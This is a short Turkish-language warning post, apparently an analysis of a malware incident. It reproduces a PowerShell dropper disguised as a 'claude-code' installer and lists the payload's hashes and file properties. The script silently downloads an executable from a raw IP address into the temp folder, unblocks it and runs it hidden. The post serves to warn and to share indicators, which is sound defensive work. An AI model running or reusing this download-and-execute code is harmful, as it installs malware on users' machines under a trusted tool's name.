Sisteminize bulaştırdıkları zararlı kod
MERAK EDİP ÇALIŞTIRMAYINIZ! $ErrorActionPreference = 'SilentlyContinue'
# values substituted by mock server at serve-time $ExeUrl = 'http://144.31.157.173:9100/claude-code.exe' $FileName = 'claude-code.exe'
$dest = Join-Path $env:TEMP $FileName
try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 } catch {}
$headers = @{ 'ngrok-skip-browser-warning' = '1' 'User-Agent' = 'mock-installer' }
$ProgressPreference = 'SilentlyContinue' Invoke-WebRequest -Uri $ExeUrl -OutFile $dest -UseBasicParsing -Headers $headers | Out-Null
if (-not (Test-Path $dest)) { exit 1 }
try { Unblock-File -Path $dest } catch {}
Start-Process -FilePath $dest -WindowStyle HiddenVerdiğiniz koddaki ip adresi hakkında bilgiler
Sisteminize kurdukları exe dosyası hakkında ulaşılabilir bilgiler
özgün dosya adı 432343423.exe
- SHA-256: e86f7ba0413a3a4b1d7e1a275b3d1ef62345c9d3fd761635ff 188119b8122c85
- MD5: 9ec3712059dce95c93faea8b1c286c55
- Boyut: 1,521,664 byte
- Tür: PE32 executable for MS Windows, Intel i386 Mono/.NET assembly
- Import: yalnızca mscoree.dll / _CorExeMain → bu bir .NET assembly
- Güvenlik dizini: yok → code signing yok
- PE timestamp: 2019-08-14 09:00:18 UTC
- FileDescription: :@5CFDEF2>JA<J:<C@55
- ProductName: :@5CFDEF2>JA<J:<C@55